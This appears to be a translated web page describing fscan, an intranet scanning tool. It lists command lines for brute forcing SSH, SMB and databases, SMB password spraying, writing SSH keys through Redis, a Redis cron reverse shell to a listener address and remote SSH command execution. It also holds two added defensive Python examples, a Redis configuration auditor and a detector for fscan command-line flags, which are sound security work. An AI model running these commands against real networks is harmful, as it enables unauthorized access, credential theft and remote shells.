Fscan: an open source tool with one click automation and omni-directional vulnerability scanning

Time: 2021-11-30

Brief introduction

Fscan is a comprehensive intranet scanning tool built for one-click, automated, all-round vulnerability scanning.

It supports host survival detection, port scanning, brute forcing of common services, ms17010, batch writing of public keys via Redis, scheduled-task reverse shells, reading Windows network adapter information, web fingerprint identification, web vulnerability scanning, NetBIOS detection, domain controller identification and other functions.

Source code link: https://github.com/shadow1ng/…

Main functions

1. Information collection:

  • Survival detection (ICMP)
  • Port scan

2. Brute forcing:

  • Various services (SSH, SMB, etc.)
  • Database password brute forcing (mysql, MSSQL, redis, PSQL, etc.)

3. System information and vulnerability scanning:

  • Get target network adapter information
  • High risk vulnerability scanning (ms17010, etc.)

4. Web detection function:

  • Webtitle detection
  • Web fingerprint identification (common CMS, OA framework, etc.)
  • Web vulnerability scanning (Weblogic, ST2, etc., POC supporting Xray)

5. Exploit:

  • Redis write public key or write scheduled task
  • SSH command execution

6. Other functions:

  • Saving results to a file
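
The Redis items under "Exploit" only work against an instance that accepts unauthenticated commands from the network, so a configuration audit is the matching defensive check. The following is an added example, not code from fscan or from the original page; the two redis.conf samples are constructed, and the check is deliberately strict (any non-loopback `bind` is reported for review).

```python
import shlex

# Constructed redis.conf samples (not from the page).
WEAK_CONF = """
# requirepass is not set
bind 0.0.0.0
protected-mode no
port 6379
"""
HARDENED_CONF = """
bind 127.0.0.1 -::1
protected-mode yes
requirepass "constructed-long-random-secret"
rename-command CONFIG ""
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

def parse(conf_text):
    """Map each directive name to the list of its argument lists."""
    settings = {}
    for line in conf_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            name, *args = shlex.split(line)
            settings.setdefault(name.lower(), []).append(args)
    return settings

def audit(conf_text):
    """Return the directives whose value leaves Redis open to file-write abuse."""
    s = parse(conf_text)
    weak = []
    binds = [a.lstrip("-") for args in s.get("bind", []) for a in args]
    if not binds or any(b not in LOOPBACK for b in binds):
        weak.append("bind")             # no bind line means all interfaces
    if s.get("protected-mode", [["yes"]])[-1] == ["no"]:
        weak.append("protected-mode")   # default is yes
    if not any(args and args[0] for args in s.get("requirepass", [])):
        weak.append("requirepass")      # no password for the default user
    renamed = {a[0].upper() for a in s.get("rename-command", []) if a}
    if "CONFIG" not in renamed:
        weak.append("rename-command")   # CONFIG still callable by clients
    return weak

if __name__ == "__main__":
    print("weak sample:", audit(WEAK_CONF))
    print("hardened sample:", audit(HARDENED_CONF))
```
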

Usage

Simple usage

fscan.exe -h 192.168.1.1/24   (all modules are used by default)
fscan.exe -h 192.168.1.1/16   (scan a class B segment)

Other uses

fscan.exe -h 192.168.1.1/24 -np -no -nopoc   (skip survival detection, do not save the output file, skip web POC scanning)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub   (write a public key via Redis)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666   (Redis scheduled-task reverse shell)
fscan.exe -h 192.168.1.1/24 -c whoami   (SSH command execution after successful brute forcing)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222   (specify the SSH module and port)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt   (load user names and passwords from the specified files for brute forcing)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt   (specify the path for the scan results; saved in the current path by default)
fscan.exe -h 192.168.1.1/8   (for a class A segment, 192.x.x.1 and 192.x.x.254, convenient for a quick view of network segment information)
fscan.exe -h 192.168.1.1/24 -m smb -pwd password   (SMB password spraying)
fscan.exe -h 192.168.1.1/24 -m ms17010   (specify module)
fscan.exe -hf ip.txt   (import targets from a file)

Compile command

go build -ldflags="-s -w " -trimpath  

Complete parameters

  -Num int  
        poc rate (default 20)  
  -c string  
        exec command (ssh)  
  -cookie string  
        set poc cookie  
  -debug  
        debug mode will print more error info  
  -domain string  
        smb domain  
  -h string  
        IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12  
  -hf string  
        host file, -hs ip.txt  
  -m string  
        Select scan type ,as: -m ssh (default "all")  
  -no  
        not to save output log  
  -nopoc  
        not to scan web vul  
  -np  
        not to ping  
  -o string  
        Outputfile (default "result.txt")  
  -p string  
        Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9200,11211,270179098,9448,8888,82,8858,1081,8879,21502,9097,8088,8090,8200,91,1080,889,8834,8011,9986,9043,9988,7080,10000,9089,8028,9999,8001,89,8086,8244,9000,2008,8080,7000,8030,8983,8096,8288,18080,8020,8848,808,8099,6868,18088,10004,8443,8042,7008,8161,7001,1082,8095,8087,8880,9096,7074,8044,8048,9087,10008,2020,8003,8069,20000,7688,1010,8092,8484,6648,9100,21501,8009,8360,9060,85,99,8000,9085,9998,8172,8899,9084,9010,9082,10010,7005,12018,87,7004,18004,8098,18098,8002,3505,8018,3000,9094,83,8108,1118,8016,20720,90,8046,9443,8091,7002,8868,8010,18082,8222,7088,8448,18090,3008,12443,9001,9093,7003,8101,14000,7687,8094,9002,8082,9081,8300,9086,8081,8089,8006,443,7007,7777,1888,9090,9095,81,1000,18002,8800,84,9088,7071,7070,8038,9091,8258,9008,9083,16080,88,8085,801,5555,7680,800,8180,9800,10002,18000,18008,98,28018,86,9092,8881,8100,8012,8084,8989,6080,7078,18001,8093,8053,8070,8280,880,92,9099,8181,9981,8060,8004,8083,10001,8097,21000,80,7200,888,7890,3128,8838,8008,8118,9080,2100,7180,9200")  
  -ping  
        using ping replace icmp  
  -pocname string  
        use the pocs these contain pocname, -pocname weblogic  
  -proxy string  
        set poc proxy, -proxy http://127.0.0.1:8080  
  -pwd string  
        password  
  -pwdf string  
        password file  
  -rf string  
        redis file to write sshkey file (as: -rf id_rsa.pub)  
  -rs string  
        redis shell to write cron file (as: -rs 192.168.1.1:6666)  
  -t int  
        Thread nums (default 600)  
  -time int  
        Set timeout (default 3)  
  -u string  
        url  
  -uf string  
        urlfile  
  -user string  
        username  
  -userf string  
        username file  
  -wt int  
        Set web timeout (default 5)  
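
For detection, the flag names listed above are more reliable than the binary name, because the executable can be renamed while the flags stay the same. The following is an added example, not part of fscan or the original page: it classifies process-creation command lines by flag combination, and it normalises `-x`, `--x` and `-x=value`, all of which Go's standard `flag` package accepts. The events, host names and paths are constructed.

```python
import re
import shlex

# Flag names below are taken from the page's "Complete parameters" list.
TARGET = {"-h", "-hf", "-u", "-uf"}
DISTINCTIVE = {"-np", "-no", "-nopoc", "-pocname", "-pwdf", "-userf", "-rf", "-rs", "-wt"}
HIGH_RISK = {"-rf": "redis public key write", "-rs": "redis cron write",
             "-c": "ssh command execution", "-pwdf": "password list",
             "-userf": "user list"}

# Constructed process-creation events (hosts, paths and binary names are made up).
EVENTS = [
    {"host": "ws01", "cmdline": r"C:\Users\Public\fscan.exe -h 192.168.1.1/24 -np -no -nopoc"},
    {"host": "ws02", "cmdline": r"C:\Windows\Temp\upd.exe --h=192.168.1.1/24 -m ssh -pwdf pwd.txt -userf users.txt"},
    {"host": "srv1", "cmdline": "/tmp/.x -h 192.168.1.1/24 -rf id_rsa.pub"},
    {"host": "ws03", "cmdline": r"C:\Windows\System32\PING.EXE -n 1 192.168.1.1"},
    {"host": "ws04", "cmdline": r"C:\Windows\System32\curl.exe -h"},
]

def flag_names(tokens):
    """Normalise Go-style flags: -x, --x and -x=value all become -x."""
    names = set()
    for tok in tokens:
        m = re.fullmatch(r"--?([A-Za-z]+)(?:=.*)?", tok)
        if m:
            names.add("-" + m.group(1))
    return names

def classify(event):
    """Return a finding dict for fscan-like invocations, else None."""
    tokens = shlex.split(event["cmdline"], posix=False)
    image = re.split(r"[\\/]", tokens[0].strip('"'))[-1].lower()
    flags = flag_names(tokens[1:])
    by_name = "fscan" in image
    # A target flag alone is too generic; require a distinctive flag as well.
    by_flags = bool(flags & TARGET) and bool(flags & DISTINCTIVE)
    if not (by_name or by_flags):
        return None
    return {"host": event["host"], "image": image, "renamed": not by_name,
            "risky": sorted(HIGH_RISK[f] for f in flags & set(HIGH_RISK))}

def scan(events):
    """Classify every event and keep only the findings."""
    return [f for f in map(classify, events) if f]

if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(finding)
```
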

Running screenshot

fscan.exe -h 192.168.x.x   (full function, ms17010, read network card information)

fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis write public key)

fscan.exe -h 192.168.x.x -c "whoami;id" (SSH command)

fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 (one-click support for Xray POCs)

The developers of this project refer to these open source projects:
